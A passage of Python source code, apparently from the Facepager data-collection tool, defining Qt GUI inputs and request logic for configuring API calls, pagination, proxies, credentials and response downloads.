options['format'] = self.formatEdit.currentText().strip()
except AttributeError:
pass
#payload
try:
if options.get('verb','GET') in ['POST','PUT','PATCH']:
options['encoding'] = self.encodingEdit.currentText().strip()
if options['encoding'] == 'multipart/form-data':
options['payload'] = self.multipartEdit.getParams()
else:
options['payload'] = self.payloadEdit.toPlainText()
except AttributeError:
pass
try:
options['filename'] = self.filenameEdit.currentText()
options['fileext'] = self.fileextEdit.currentText()
except AttributeError:
pass
#paging
try:
options['pages'] = self.pagesEdit.value()
except AttributeError:
pass
try:
options['paging_type'] = self.pagingTypeEdit.currentText().strip() if self.pagingTypeEdit.currentText() != "" else defaults.get('paging_type', '')
options['key_paging'] = self.pagingkeyEdit.text() if self.pagingkeyEdit.text() != "" else defaults.get('key_paging',None)
options['paging_stop'] = self.pagingstopEdit.text() if self.pagingstopEdit.text() != "" else defaults.get('paging_stop',None)
options['param_paging'] = self.pagingparamEdit.text() if self.pagingparamEdit.text() != "" else defaults.get('param_paging',None)
options['offset_start'] = self.offsetStartEdit.value()
options['offset_step'] = self.offsetStepEdit.value()
except AttributeError:
options['paging_type'] = defaults.get('paging_type')
options['key_paging'] = defaults.get('key_paging')
options['paging_stop'] = defaults.get('paging_stop')
options['param_paging'] = defaults.get('param_paging')
options['offset_start'] = 1
options['offset_step'] = 1
if options.get('paging_type') == 'url':
options.pop('paging_stop')
options.pop('param_paging')
options.pop('offset_start')
options.pop('offset_step')
elif options.get('paging_type') == 'decrease':
options.pop('offset_start')
options.pop('offset_step')
options.pop('paging_stop')
elif options.get('paging_type') == 'key':
options.pop('offset_start')
options.pop('offset_step')
elif options.get('paging_type') == 'count':
options.pop('key_paging')
options.pop('paging_stop')
#options for data handling
try:
options['nodedata'] = self.extractEdit.text() if self.extractEdit.text() != "" else defaults.get('nodedata')
options['objectid'] = self.objectidEdit.text() if self.objectidEdit.text() != "" else defaults.get('objectid')
except AttributeError:
options['nodedata'] = defaults.get('nodedata')
options['objectid'] = defaults.get('objectid')
# Scopes
try:
options['scope'] = self.scopeEdit.text().strip()
except AttributeError:
pass
try:
options['proxy'] = self.proxyEdit.text().strip()
except AttributeError:
pass
# Options not saved to preset but to settings
if purpose != 'preset':
# query type
options['querytype'] = self.name + ':' + self.resourceEdit.currentText()
# uploadfolder
try:
options['folder'] = self.folderEdit.text()
except AttributeError:
pass
# download folder
try:
options['downloadfolder'] = self.downloadfolderEdit.text()
except AttributeError:
pass
try:
options['access_token'] = self.tokenEdit.text()
except AttributeError:
pass
try:
options['access_token_secret'] = self.tokensecretEdit.text()
except AttributeError:
pass
try:
options['client_id'] = self.clientIdEdit.text()
except AttributeError:
pass
try:
options['client_secret'] = self.clientSecretEdit.text()
except AttributeError:
pass
return options
def updateBasePath(self, options=None):
if options is None:
basepath = self.basepathEdit.currentText().strip()
options = {'basepath' : basepath}
else:
basepath = options.get('basepath', '')
self.basepathEdit.setEditText(basepath)
index = self.basepathEdit.findText(basepath)
if index != -1:
self.basepathEdit.setCurrentIndex(index)
# Get general doc
apidoc = self.mainWindow.apiWindow.getApiDoc(self.name, basepath)
# apidoc = self.basepathEdit.itemData(index, Qt.UserRole)
# Add endpoints in reverse order
self.resourceEdit.clear()
if apidoc and isinstance(apidoc, dict):
endpoints = apidoc.get("paths", {})
paths = endpoints.keys()
for path in list(paths):
operations = endpoints[path]
path = path.replace("{", "<").replace("}", ">")
self.resourceEdit.addItem(path)
idx = self.resourceEdit.count() - 1
self.resourceEdit.setItemData(idx, wraptip(getDictValue(operations, "get.summary", "")), Qt.ToolTipRole)
# store params for later use in onChangedResource
self.resourceEdit.setItemData(idx, operations, Qt.UserRole)
self.buttonApiHelp.setVisible(True)
else:
self.resourceEdit.insertItem(0, "/<Object ID>")
def updateResource(self, options=None):
if options is None:
resource = self.resourceEdit.currentText().strip()
options = {'resource' : resource}
else:
resource = options.get('resource', '')
self.resourceEdit.setEditText(resource)
index = self.resourceEdit.findText(resource)
if index != -1:
self.resourceEdit.setCurrentIndex(index)
operations = self.resourceEdit.itemData(index, Qt.UserRole)
params = getDictValue(operations, "get.parameters", False) if operations else []
# Set param names
self.paramEdit.setNameOptionsAll(params)
# Populates input fields from loaded options and presets
# Select boxes are updated by onChangedBasepath and onChangedResource
# based on the API docs.
# @settings Dict with options
def setSettings(self, settings = {}):
# Base path
options = self.getDefaultAndDocOptions(settings)
self.updateBasePath(options)
# Resource
options = self.getDefaultAndDocOptions(settings)
self.updateResource(options)
# Params and Options
options = self.getDefaultAndDocOptions(settings)
self.updateParams(options)
self.updateOptions(options)
return options
def updateParams(self, options):
self.paramEdit.setParams(options.get('params', ''))
def updateOptions(self, options):
# Header and method
try:
self.headerEdit.setParams(options.get('headers', {}))
self.verbEdit.setCurrentIndex(self.verbEdit.findText(options.get('verb', 'GET')))
self.encodingEdit.setCurrentIndex(self.encodingEdit.findText(options.get('encoding', '<None>')))
if options.get('encoding', '<None>') == 'multipart/form-data':
self.multipartEdit.setParams(options.get('payload', {}))
else:
self.payloadEdit.setPlainText(options.get('payload', ''))
self.verbChanged()
except AttributeError:
pass
# Format
try:
self.formatEdit.setCurrentIndex(self.formatEdit.findText(options.get('format', 'json')))
except AttributeError:
pass
# Upload folder
try:
if 'folder' in options:
self.folderEdit.setText(options.get('folder'))
except AttributeError:
pass
# Download folder
try:
if 'downloadfolder' in options:
self.downloadfolderEdit.setText(options.get('downloadfolder'))
except AttributeError:
pass
try:
self.filenameEdit.setEditText(options.get('filename', '<None>'))
self.fileextEdit.setEditText(options.get('fileext', '<None>'))
except AttributeError:
pass
# Paging
try:
self.pagesEdit.setValue(int(options.get('pages', 1)))
except AttributeError:
pass
try:
self.pagingTypeEdit.setCurrentIndex(
self.pagingTypeEdit.findText(options.get('paging_type', 'key')))
self.pagingkeyEdit.setText(options.get('key_paging', ''))
self.pagingstopEdit.setText(options.get('paging_stop', ''))
self.pagingparamEdit.setText(options.get('param_paging', ''))
self.offsetStartEdit.setValue(int(options.get('offset_start', 1)))
self.offsetStepEdit.setValue(int(options.get('offset_step', 1)))
self.pagingChanged()
except AttributeError:
pass
# Extract options
try:
self.extractEdit.setText(options.get('nodedata'))
self.objectidEdit.setText(options.get('objectid'))
except AttributeError:
pass
# Scope
try:
self.scopeEdit.setText(options.get('scope', ''))
except AttributeError:
pass
# Proxy
try:
self.proxyEdit.setText(options.get('proxy', ''))
except AttributeError:
pass
# Credentials
try:
if 'access_token' in options:
self.tokenEdit.setText(options.get('access_token', ''))
if 'access_token_secret' in options:
self.tokensecretEdit.setText(options.get('access_token_secret', ''))
if 'client_id' in options:
self.clientIdEdit.setText(options.get('client_id', ''))
if 'client_secret' in options:
self.clientSecretEdit.setText(options.get('client_secret', ''))
except AttributeError:
pass
def saveSettings(self):
self.mainWindow.settings.beginGroup("ApiModule_" + self.name)
options = self.getSettings('settings')
for key in list(options.keys()):
self.mainWindow.settings.setValue(key, options[key])
self.mainWindow.settings.endGroup()
def loadSettings(self):
self.mainWindow.settings.beginGroup("ApiModule_" + self.name)
options = {}
for key in self.mainWindow.settings.allKeys():
options[key] = self.mainWindow.settings.value(key)
self.mainWindow.settings.endGroup()
self.setSettings(options)
@Slot(str)
def logMessage(self,message):
self.mainWindow.logmessage(message)
def reloadDoc(self):
self.saveSettings()
self.loadDoc()
self.loadSettings()
def loadDoc(self):
'''
Loads and prepares documentation
'''
# Add base paths
self.basepathEdit.clear()
urls = self.mainWindow.apiWindow.getApiBasePaths(self.name)
self.basepathEdit.insertItems(0,urls)
# TODO: set API Docs as item data
def showDoc(self):
'''
Open window with documentation
'''
basepath = self.basepathEdit.currentText().strip()
path = self.resourceEdit.currentText().strip()
self.mainWindow.apiWindow.showDoc(self.name, basepath, path)
def getDefaultAndDocOptions(self, options = {}):
# Set default options
defaults = self.defaults.copy()
defaults.update(self.getDocOptions())
defaults.update(options)
return defaults
def getDocOptions(self):
# def getFromDoc(self, dockey, defaultkey=None):
# dockey = dockey.replace("<", "{").replace(">", "}")
# value = getDictValue(self.apidoc, dockey, dump=False, default=None)
# if (value is None) and (defaultkey is not None):
# value = self.defaults.get(defaultkey)
# return value
# Get general doc
basepath = self.basepathEdit.currentText().strip()
apidoc = self.mainWindow.apiWindow.getApiDoc(self.name,basepath)
# Get response doc
resourceidx = self.resourceEdit.findText(self.resourceEdit.currentText())
operations = self.resourceEdit.itemData(resourceidx,Qt.UserRole) if resourceidx != -1 else {}
schema = getDictValue(operations, "get.responses.200.content.application/json.schema", []) if operations else []
options = {}
# Params
params = getDictValue(operations, "get.parameters", False) if operations else []
defaultparams = {}
for param in params:
# Default values for required params
if param.get("required", False) or param.get("x-facepager-default", False):
name = param.get("name", "")
name = "<" + name + ">" if param.get("in", "query") == "path" else name
value = param.get("example", "<Object ID>")
defaultparams[name] = value
options['params'] = defaultparams
# Path extension for Twitter (deprecated)
options['extension'] = getDictValue(apidoc, "servers.0.x-facepager-suffix")
# Default extract settings
options['objectid'] = getDictValueOrNone(apidoc, "x-facepager-objectid")
options['nodedata'] = getDictValueOrNone(apidoc, "x-facepager-extract")
# Default pagination settings
pagination = getDictValueOrNone(apidoc, "x-facepager-pagination", dump=False)
options['paging_type'] = getDictValueOrNone(pagination, 'method')
options['param_paging'] = getDictValueOrNone(pagination, 'param')
options['key_paging'] = getDictValueOrNone(pagination, 'key')
options['paging_stop'] = getDictValueOrNone(pagination, 'stop')
# Default authorization settings
authorization = getDictValueOrNone(apidoc, "x-facepager-authorization", dump=False)
options['auth_type'] = getDictValueOrNone(authorization, 'auth_type')
options['auth_uri'] = getDictValueOrNone(authorization, 'auth_uri')
options['auth_tokenuri'] = getDictValueOrNone(authorization, 'token_uri')
options['auth'] = getDictValueOrNone(authorization, 'auth_method')
options['auth_tokenname'] = getDictValueOrNone(authorization, 'token_name')
# Extract options from response reference
if 'x-facepager-extract' in schema:
options['nodedata'] = schema.get('x-facepager-extract')
if 'x-facepager-objectid' in schema:
options['objectid'] = schema.get('x-facepager-objectid')
options = {k: v for k, v in options.items() if v is not None}
return options
def initInputs(self):
'''
Create base path edit, resource edit and param edit
Set resource according to the APIdocs, if any docs are available
'''
#Base path
self.basepathEdit = QComboBox(self)
if not self.defaults.get('basepath',None) is None:
self.basepathEdit.insertItems(0, [self.defaults.get('basepath','')])
self.basepathEdit.setEditable(True)
self.mainLayout.addRow("Base path", self.basepathEdit)
self.basepathEdit.currentIndexChanged.connect(self.onChangedBasepath)
#Resource
self.resourceLayout = QHBoxLayout()
self.actionApiHelp = QAction('Open documentation if available.',self)
self.actionApiHelp.setText('?')
self.actionApiHelp.triggered.connect(self.showDoc)
self.buttonApiHelp =QToolButton(self)
self.buttonApiHelp.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.buttonApiHelp.setDefaultAction(self.actionApiHelp)
self.buttonApiHelp.setVisible(False)
self.resourceEdit = QComboBox(self)
self.resourceEdit.setEditable(True)
self.resourceLayout.addWidget(self.resourceEdit)
self.resourceLayout.addWidget(self.buttonApiHelp)
self.mainLayout.addRow("Resource", self.resourceLayout)
#Parameters
self.paramEdit = QParamEdit(self)
self.mainLayout.addRow("Parameters", self.paramEdit)
self.resourceEdit.currentIndexChanged.connect(self.onChangedResource)
def getFileFolderName(self,options, nodedata):
# Folder
foldername = options.get('downloadfolder', None)
if foldername == '':
foldername = None
# File
filename = options.get('filename', None)
if (filename is not None) and (filename == '<None>'):
filename = None
else:
filename = self.parsePlaceholders(filename,nodedata)
if filename == '':
filename = None
# Extension
fileext = options.get('fileext', None)
if fileext is not None and fileext == '<None>':
fileext = None
elif fileext is not None and fileext != '':
fileext = self.parsePlaceholders(fileext,nodedata)
return (foldername,filename,fileext)
# Upload folder
def initUploadFolderInput(self):
self.folderwidget = QWidget()
folderlayout = QHBoxLayout()
folderlayout.setContentsMargins(0,0,0,0)
self.folderwidget.setLayout(folderlayout)
self.folderEdit = QLineEdit()
folderlayout.addWidget(self.folderEdit)
self.folderButton = QPushButton("...", self)
self.folderButton.clicked.connect(self.selectFolder)
folderlayout.addWidget(self.folderButton)
self.mainLayout.addRow("Upload folder", self.folderwidget)
# Download folder
def initFileInputs(self):
self.downloadfolderwidget = QWidget()
folderlayout = QHBoxLayout()
folderlayout.setContentsMargins(0,0,0,0)
self.downloadfolderwidget.setLayout(folderlayout)
# Folder edit
self.downloadfolderEdit = QLineEdit()
self.downloadfolderEdit.setToolTip(wraptip("Select a folder if you want to save the responses to files."))
folderlayout.addWidget(self.downloadfolderEdit,2)
# Select folder button
self.actionDownloadFolder = QAction('...',self)
self.actionDownloadFolder.setText('..')
self.actionDownloadFolder.triggered.connect(self.selectDownloadFolder)
self.downloadfolderButton =QToolButton(self)
self.downloadfolderButton.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.downloadfolderButton.setDefaultAction(self.actionDownloadFolder)
folderlayout.addWidget(self.downloadfolderButton,0)
# filename
folderlayout.addWidget(QLabel("Filename"),0)
self.filenameEdit = QComboBox(self)
self.filenameEdit .setToolTip(wraptip("Set the filename, if you want to save the responses to files. <Object ID> usually is a good choice."))
self.filenameEdit.insertItems(0, ['<Object ID>','<None>'])
self.filenameEdit.setEditable(True)
folderlayout.addWidget(self.filenameEdit,1)
# fileext
folderlayout.addWidget(QLabel("Custom file extension"),0)
self.fileextEdit = QComboBox(self)
self.fileextEdit .setToolTip(wraptip("Set the extension of the files, for example .json, .txt or .html. Set to <None> to automatically guess from the response."))
self.fileextEdit.insertItems(0, ['<None>','.html','.txt'])
self.fileextEdit.setEditable(True)
folderlayout.addWidget(self.fileextEdit,1)
#layout.setStretch(2, 1)
self.extraLayout.addRow("Download", self.downloadfolderwidget)
def pagingChanged(self):
if self.pagingTypeEdit.currentText() == "count":
self.pagingParamWidget.show()
self.pagingStepsWidget.show()
self.pagingKeyWidget.hide()
elif self.pagingTypeEdit.currentText() == "url":
self.pagingParamWidget.hide()
self.pagingStepsWidget.hide()
self.pagingKeyWidget.show()
else:
self.pagingParamWidget.show()
self.pagingStepsWidget.hide()
self.pagingKeyWidget.show()
if self.pagingTypeEdit.count() < 2:
self.pagingTypeEdit.hide()
def initPagingInputs(self,keys = False):
layout= QHBoxLayout()
if keys:
# Paging type
self.pagingTypeEdit = QComboBox(self)
self.pagingTypeEdit.addItem('key')
self.pagingTypeEdit.addItem('count')
self.pagingTypeEdit.addItem('url')
self.pagingTypeEdit.setToolTip(wraptip("Select 'key' if the response contains data about the next page, e.g. page number or offset. Select 'count' if you want to increase the paging param by a fixed amount. Select 'url' if the response contains a complete URL to the next page."))
self.pagingTypeEdit.currentIndexChanged.connect(self.pagingChanged)
layout.addWidget(self.pagingTypeEdit)
layout.setStretch(0, 0)
# Paging param
self.pagingParamWidget = QWidget()
self.pagingParamLayout = QHBoxLayout()
self.pagingParamLayout .setContentsMargins(0, 0, 0, 0)
self.pagingParamWidget.setLayout(self.pagingParamLayout)
self.pagingParamLayout.addWidget(QLabel("Param"))
self.pagingparamEdit = QLineEdit(self)
self.pagingparamEdit.setToolTip(wraptip("This parameter will be added to the query if you select key-pagination. The value is extracted by the paging key."))
self.pagingParamLayout.addWidget(self.pagingparamEdit)
self.pagingParamLayout.setStretch(0,0)
self.pagingParamLayout.setStretch(1, 0)
layout.addWidget(self.pagingParamWidget)
layout.setStretch(1, 2)
# Paging key
self.pagingKeyWidget = QWidget()
self.pagingKeyLayout = QHBoxLayout()
self.pagingKeyLayout .setContentsMargins(0, 0, 0, 0)
self.pagingKeyWidget.setLayout(self.pagingKeyLayout)
self.pagingKeyLayout.addWidget(QLabel("Paging key"))
self.pagingkeyEdit = QLineEdit(self)
self.pagingkeyEdit.setToolTip(wraptip("If the respsonse contains data about the next page, specify the key. The value will be added as paging parameter or used as the URL."))
self.pagingKeyLayout.addWidget(self.pagingkeyEdit)
self.pagingKeyLayout.setStretch(0, 0)
self.pagingKeyLayout.setStretch(1, 1)
layout.addWidget(self.pagingKeyWidget)
layout.setStretch(2, 2)
# Page steps
self.pagingStepsWidget = QWidget()
self.pagingStepsLayout = QHBoxLayout()
self.pagingStepsLayout.setContentsMargins(0, 0, 0, 0)
self.pagingStepsWidget.setLayout(self.pagingStepsLayout)
self.pagingStepsLayout.addWidget(QLabel("Start value"))
self.offsetStartEdit = QSpinBox(self)
self.offsetStartEdit.setValue(1)
self.offsetStartEdit.setToolTip(wraptip("First page or offset number, defaults to 1"))
self.pagingStepsLayout.addWidget(self.offsetStartEdit)
self.pagingStepsLayout.setStretch(0, 0)
self.pagingStepsLayout.setStretch(1, 1)
self.pagingStepsLayout.addWidget(QLabel("Step"))
self.offsetStepEdit = QSpinBox(self)
self.offsetStepEdit.setMaximum(10000)
self.offsetStepEdit.setValue(1)
self.offsetStepEdit.setToolTip(wraptip("Amount to increase for each page, defaults to 1"))
self.pagingStepsLayout.addWidget(self.offsetStepEdit)
self.pagingStepsLayout.setStretch(2, 0)
self.pagingStepsLayout.setStretch(3, 1)
layout.addWidget(self.pagingStepsWidget)
layout.setStretch(3, 1)
# Stop if
layout.addWidget(QLabel("Stop key"))
self.pagingstopEdit = QLineEdit(self)
self.pagingstopEdit.setToolTip(wraptip("Stops fetching data as soon as the given key is present but empty or false. For example, stops fetching if the value of 'hasNext' ist false, none or an empty list. Usually you can leave the field blank, since fetching will stop anyway when the paging key is empty."))
layout.addWidget(self.pagingstopEdit)
layout.setStretch(4, 0)
layout.setStretch(5, 1)
#Page count
layout.addWidget(QLabel("Maximum pages"))
self.pagesEdit = QSpinBox(self)
self.pagesEdit.setMinimum(1)
self.pagesEdit.setMaximum(50000)
self.pagesEdit.setToolTip(wraptip("Number of maximum pages."))
layout.addWidget(self.pagesEdit)
layout.setStretch(6, 0)
layout.setStretch(7, 0)
rowcaption = "Paging"
else:
#Page count
self.pagesEdit = QSpinBox(self)
self.pagesEdit.setMinimum(1)
self.pagesEdit.setMaximum(50000)
layout.addWidget(self.pagesEdit)
rowcaption = "Maximum pages"
self.extraLayout.addRow(rowcaption, layout)
def initHeaderInputs(self):
self.headerEdit = QParamEdit(self)
self.mainLayout.addRow("Headers", self.headerEdit)
def initVerbInputs(self):
# Verb and encoding
self.verbEdit = QComboBox(self)
self.verbEdit.addItems(['GET','HEAD','POST','PUT','PATCH','DELETE'])
self.verbEdit.currentIndexChanged.connect(self.verbChanged)
self.encodingLabel = QLabel("Encoding")
self.encodingEdit = QComboBox(self)
self.encodingEdit.addItems(['<None>','multipart/form-data'])
self.encodingEdit.currentIndexChanged.connect(self.verbChanged)
layout= QHBoxLayout()
layout.addWidget(self.verbEdit)
layout.setStretch(0, 1)
layout.addWidget(self.encodingLabel)
layout.addWidget(self.encodingEdit)
layout.setStretch(2, 1)
self.mainLayout.addRow("Method", layout)
# Payload
self.payloadWidget = QWidget()
self.payloadLayout = QHBoxLayout()
self.payloadLayout.setContentsMargins(0,0,0,0)
self.payloadWidget.setLayout(self.payloadLayout)
self.payloadEdit = QPlainTextEdit()
self.payloadEdit.setLineWrapMode(QPlainTextEdit.NoWrap)
self.payloadLayout.addWidget(self.payloadEdit)
self.payloadLayout.setStretch(0, 1);
self.multipartEdit = QParamEdit()
self.payloadLayout.addWidget(self.multipartEdit)
self.payloadLayout.setStretch(0, 1);
self.payloadLayout.setStretch(2, 1);
self.mainLayout.addRow("Payload", self.payloadWidget)
def verbChanged(self):
if self.verbEdit.currentText() in ['GET','DELETE','HEAD']:
self.payloadWidget.hide()
self.mainLayout.labelForField(self.payloadWidget).hide()
self.encodingEdit.hide()
self.encodingLabel.hide()
self.folderwidget.hide()
self.mainLayout.labelForField(self.folderwidget).hide()
else:
self.payloadWidget.show()
self.mainLayout.labelForField(self.payloadWidget).show()
#Encoding
self.encodingEdit.show()
self.encodingLabel.show()
#Multipart
if self.encodingEdit.currentText().strip() == 'multipart/form-data':
self.multipartEdit.show()
self.payloadEdit.hide()
#self.payloadEdit.setPlainText(json.dumps(self.multipartEdit.getParams(),indent=4,))
else:
self.payloadEdit.show()
self.multipartEdit.hide()
#Folder
self.folderwidget.show()
self.mainLayout.labelForField(self.folderwidget).show()
def initResponseInputs(self, format=False):
layout= QHBoxLayout()
if not format:
#Extract
self.extractEdit = QLineEdit(self)
layout.addWidget(self.extractEdit)
layout.setStretch(0, 1)
layout.addWidget(QLabel("Key for Object ID"))
self.objectidEdit = QLineEdit(self)
layout.addWidget(self.objectidEdit)
layout.setStretch(2, 1)
#Add layout
self.extraLayout.addRow("Key to extract", layout)
else:
# Format
self.formatEdit = QComboBox(self)
self.formatEdit.addItems(['json', 'text', 'links','xml','file'])
self.formatEdit.setToolTip("<p>JSON: default option, data will be parsed as JSON. </p> \
<p>Text: data will not be parsed and embedded in JSON. </p> \
<p>Links: data will be parsed as xml and links will be extracted (set key to extract to 'links' and key for Object ID to 'url'). </p> \
<p>XML: data will be parsed as XML and converted to JSON. </p> \
<p>File: data will only be downloaded to files, specify download folder and filename.</p>")
layout.addWidget(self.formatEdit)
layout.setStretch(0, 0)
# self.formatEdit.currentIndexChanged.connect(self.formatChanged)
# Extract
layout.addWidget(QLabel("Key to extract"))
self.extractEdit = QLineEdit(self)
self.extractEdit.setToolTip(wraptip(
"If your data contains a list of objects, set the key of the list. Every list element will be adeded as a single node. Remaining data will be added as offcut node."))
layout.addWidget(self.extractEdit)
layout.setStretch(1, 0)
layout.setStretch(2, 2)
layout.addWidget(QLabel("Key for Object ID"))
self.objectidEdit = QLineEdit(self)
self.objectidEdit.setToolTip(
wraptip("If your data contains unique IDs for every node, define the corresponding key."))
layout.addWidget(self.objectidEdit)
layout.setStretch(3, 0)
layout.setStretch(4, 2)
# Add layout
self.extraLayout.addRow("Response", layout)
@Slot()
def onChangedBasepath(self, index = None):
'''
Handles the automated resource suggestion for the
selected API based on the OpenAPI specification 3.0.0
'''
if index is None:
index = self.basepathEdit.findText(self.basepathEdit.currentText())
if index != -1:
self.basepathEdit.setCurrentIndex(index)
self.updateBasePath()
self.updateResource()
defaults = self.getDefaultAndDocOptions()
self.updateParams(defaults)
self.updateOptions(defaults)
@Slot()
def onChangedResource(self, index = None):
'''
Handles the automated parameter suggestion for the
selected API endpoint based on the OpenAPI specification 3.0.0
'''
if index is None:
index = self.resourceEdit.findText(self.resourceEdit.currentText())
if index != -1:
self.resourceEdit.setCurrentIndex(index)
self.updateResource()
defaults = self.getDefaultAndDocOptions()
self.updateParams(defaults)
self.updateOptions(defaults)
@Slot()
def onChangedParam(self,index=0):
pass
def getProxies(self, reload=False):
if not hasattr(self, "proxies") or reload:
self.proxies = {}
if hasattr(self, "proxyEdit"):
self.proxies = self.proxyEdit.text().strip()
self.proxies = self.proxies.split(";")
if len(self.proxies) == 0:
proxy = ""
elif len(self.proxies) == 1:
proxy = self.proxies[0]
else:
proxy = self.proxies[0]
self.proxies = self.proxies[1:] + self.proxies[:1]
if proxy.startswith('http'):
proxy_http = "http://"+re.sub('^https?://', '', proxy)
proxy_https = "https://" + re.sub('^https?://', '', proxy)
return {'http': proxy_http, 'https': proxy_https}
elif proxy != "":
return {'http': proxy, 'https': proxy}
else:
return {}
# if not hasattr(self,"proxies") or reload:
# try:
# filename = os.path.join(os.path.expanduser("~"), 'Facepager','proxies.json')
# if os.path.exists(filename):
# with open(filename, 'r', encoding='utf-8') as f:
# self.proxies = json.load(f)
# else:
# self.proxies = {}
# except Exception as e:
# self.logMessage("Error loading proxies: {}".format(str(e)))
# self.proxies = {}
#
# return proxy
def initPagingOptions(self, data, options):
# only empty if requested
if options.get('emptyonly', False):
lastdata = getDictValueOrNone(options, 'lastdata', dump=False)
if lastdata is not None:
return None
# paging by auto count
if (options.get('paging_type') == "count") and (options.get('param_paging', '') is not None):
offset = options.get('offset_start', 1)
options['params'][options.get('param_paging', '')] = offset
# paging by key (continue previous fetching process based on last fetched child offcut node)
elif (options.get('paging_type') == "key") and (options.get('key_paging') is not None) and (options.get('param_paging') is not None):
# Get cursor of last offcut node
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
cursor = getDictValueOrNone(offcut,options.get('key_paging'))
stopvalue = not extractValue(offcut,options.get('paging_stop'), dump = False, default = True)[1]
# Dont't fetch if already finished (=offcut without next cursor)
if options.get('resume',False) and (offcut is not None) and ((cursor is None) or stopvalue):
return None
# Continue / start fetching
elif (cursor is not None) :
options['params'][options['param_paging']] = cursor
# url based paging
elif (options.get('paging_type') == "url") and (options.get('key_paging') is not None):
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
url = getDictValueOrNone(offcut,options.get('key_paging'))
# Dont't fetch if already finished (=offcut without next cursor)
if options.get('resume',False) and (offcut is not None) and (url is None):
return None
if url is not None:
url, params = self.parseURL(url)
options['params'] = params
options['url'] = url
elif (options.get('paging_type') == "decrease"):
node= getDictValueOrNone(options, 'lastdata.response', dump=False)
cursor = getDictValueOrNone(node, options.get('key_paging'))
if (node is not None):
if cursor is None:
return None
try:
cursor = int(cursor) - 1
options['params'][options['param_paging']] = cursor
except:
return None
# break if "continue pagination" is checked and data already present
elif options.get('resume',False):
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
# Dont't fetch if already finished (=offcut)
if (offcut is not None):
return None
return options
def updatePagingOptions(self, data, options):
# Stop if result is empty
if (options['nodedata'] is not None) and not hasValue(data, options['nodedata']):
return None
# paging by auto count
if (options.get('paging_type') == "count") and (options.get('param_paging') is not None):
offset = options['params'][options['param_paging']]
offset = offset + options.get('offset_step', 1)
options['params'][options['param_paging']] = offset
# paging by key
elif (options.get('paging_type') == "key") and (options.get('key_paging') is not None) and (
options.get('param_paging') is not None):
cursor = getDictValueOrNone(data, options['key_paging'])
if cursor is None:
return None
stopvalue = not extractValue(data, options.get('paging_stop'), dump=False, default=True)[1]
if stopvalue:
return None
options['params'][options['param_paging']] = cursor
# url based paging
elif (options.get('paging_type') == "url") and (options.get('key_paging') is not None):
url = getDictValueOrNone(data, options['key_paging'])
if url is not None:
url, params = self.parseURL(url)
options['params'] = params
options['url'] = url
else:
return None
elif (options.get('paging_type') == "decrease"):
# manual paging with max-id
# if there are still statuses in the response, use the last ID-1 for further pagination
if isinstance(data, list) and (len(data) > 0):
node = data[-1]
else:
node = data
cursor = getDictValueOrNone(node, options['key_paging'])
if cursor is None:
return None
try:
cursor = int(cursor) - 1
options['params'][options['param_paging']] = cursor
except:
return None
# no pagination
else:
return None
return options
def buildUrl(self, nodedata, options, logProgress=None):
if not ('url' in options):
urlpath = options["basepath"].strip() + options['resource'].strip() + options.get('extension', '')
urlparams = {}
urlparams.update(options['params'])
urlpath, urlparams, templateparams = self.getURL(urlpath, urlparams, nodedata, options)
requestheaders = options.get('headers', {})
# Authorization
if options.get('auth','disable') != 'disable':
token = options.get('auth_prefix','') + options.get('access_token','')
if options.get('auth') == 'param':
urlparams[options.get('auth_tokenname')] = token
elif (options.get('auth') == 'header'):
requestheaders[options.get('auth_tokenname')] = token
method = options.get('verb', 'GET')
payload = self.getPayload(options.get('payload', None), templateparams, nodedata, options, logProgress)
if isinstance(payload, MultipartEncoder) or isinstance(payload, MultipartEncoderMonitor):
requestheaders["Content-Type"] = payload.content_type
else:
method = options.get('verb', 'GET')
payload = None
urlpath = options['url']
urlparams = options['params']
requestheaders = {}
# sign request (for Amazon tab)
if hasattr(self, "signRequest"):
requestheaders = self.signRequest(urlpath, urlparams, requestheaders, method, payload, options)
return method, urlpath, urlparams, payload, requestheaders
def initSession(self, no=0, renew=False):
"""
Return existing session or create a new session if necessary
:param no: Session number
:return: session
"""
with self.lock_session:
while (len(self.sessions) <= no):
self.sessions.append(None)
session = self.sessions[no] if not renew else None
if session is None:
session = requests.Session()
session.proxies.update(self.getProxies())
# Mount new adapters = don't cache connections
adapter = requests.adapters.HTTPAdapter()
session.mount('http://', adapter)
session.mount('https://', adapter)
session.mount('file://', LocalFileAdapter())
self.sessions[no] = session
return session
def closeSession(self, no=0):
"""
Close the session
:param no: number of session
:return: None
"""
with self.lock_session:
if (len(self.sessions) > no) and (self.sessions[no] is not None):
self.sessions[no].close()
self.sessions[no] = None
def request(self, session_no=0, path=None, args=None, headers=None, method="GET", payload=None,foldername=None,
filename=None, fileext=None, format='json'):
"""
Start a new threadsafe session and request
"""
def download(response,foldername=None,filename=None,fileext=None):
if foldername is not None and filename is not None:
if fileext is None:
contentype = response.headers.get("content-type")
if contentype is not None:
guessed_ext = guess_all_extensions(contentype)
fileext = guessed_ext[-1] if len(guessed_ext) > 0 else None
else:
fileext = None
fullfilename = makefilename(path,foldername, filename, fileext)
file = open(fullfilename, 'wb')
else:
fullfilename = None
file = None
# requests completely downloads data to memory if not stream=True
# iter_content, text and content all fall back to the previously downloaded content
# no need to download into string object a second time
try:
content = io.BytesIO()
try:
for chunk in response.iter_content(1024):
content.write(chunk)
if file is not None:
file.write(chunk)
out = content.getvalue()
encoding = cchardet.detect(out)['encoding']
encoding = 'utf-8' if encoding is None else encoding
out = out.decode(encoding)
except Exception as e:
out = str(e)
finally:
content.close()
finally:
if file is not None:
file.close()
# if file is not None:
# try:
# for chunk in response.iter_content(1024):
# file.write(chunk)
# finally:
# file.close()
return (fullfilename, out)
#Throttle speed
if (self.speed is not None) and (self.lastrequest is not None):
pause = ((60 * 1000) / float(self.speed)) - self.lastrequest.msecsTo(QDateTime.currentDateTime())
while (self.connected) and (pause > 0):
time.sleep(0.1)
pause = ((60 * 1000) / float(self.speed)) - self.lastrequest.msecsTo(QDateTime.currentDateTime())
self.lastrequest = QDateTime.currentDateTime()
if session_no is None:
session_no = 0
self.closeSession(session_no)
session = self.initSession(session_no)
try:
response = None
try:
maxretries = 3
while True:
try:
if (not session):
raise Exception("No session available.")
# Use cookie jar instead of header to persist redirects
cookies = headers.pop('Cookie', None) if headers is not None else None
if cookies is not None:
cookies = dict(item.split("=",maxsplit=1) for item in cookies.split(";"))
